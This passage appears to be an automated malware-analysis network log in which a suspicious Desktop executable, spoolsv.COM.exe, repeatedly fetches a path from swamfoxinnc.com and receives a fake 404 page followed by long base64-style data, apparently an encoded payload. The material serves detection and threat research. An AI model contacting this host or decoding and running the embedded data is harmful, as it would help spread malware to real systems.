                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:33 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:33 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.1049855176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:35 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:36 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:36 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:36 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:37 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:37 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:37 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.1049864176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:38 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:40 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:40 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:40 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:40 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:40 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:40 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.1049875176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:42 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:43 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:43 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:43 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:44 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:44 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:44 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.1049883176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:46 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:47 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:47 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:47 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:47 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
